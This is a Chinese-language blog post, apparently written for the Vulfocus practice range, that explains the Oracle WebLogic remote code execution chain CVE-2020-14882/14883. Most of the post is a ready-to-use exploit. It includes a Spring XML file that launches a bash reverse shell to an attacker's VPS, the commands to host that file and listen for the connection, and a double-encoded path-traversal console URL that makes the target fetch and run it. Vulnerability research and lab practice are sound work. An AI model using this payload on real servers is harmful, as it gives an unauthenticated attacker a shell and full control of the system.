Vulfocus靶场 | weblogic 远程代码执行（CVE-2020-14882）

漏洞描述

Oracle WebLogic Server 远程代码执行漏洞（CVE-2020-14882）POC 被公开，未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求，结合 CVE-2020-14883 漏洞进行利用，利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ，并执行任意代码，利用门槛低，危害巨大。

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求，利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件，且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后，远程且未经授权的攻击者可以直接在服务端执行任意代码，获取系统权限。

漏洞复现

VPS上部署一个poc.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >& /dev/tcp/vps_ip/vps_port 0>&1]]></value> 
          </list>
        </constructor-arg>
    </bean>
</beans>

VPS开启http服务

python -m http.server

并且开启监听

http://123.58.224.8:37529/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://vpsip:8000/poc.xml%22)

posted @ 2022-08-20 22:35 mlxwl 阅读(275) 评论(0) 编辑收藏举报

刷新页面返回顶部

mlxwl

Vulfocus靶场 | weblogic 远程代码执行 （CVE-2020-14882）

漏洞描述

漏洞复现

公告

Vulfocus靶场 | weblogic 远程代码执行（CVE-2020-14882）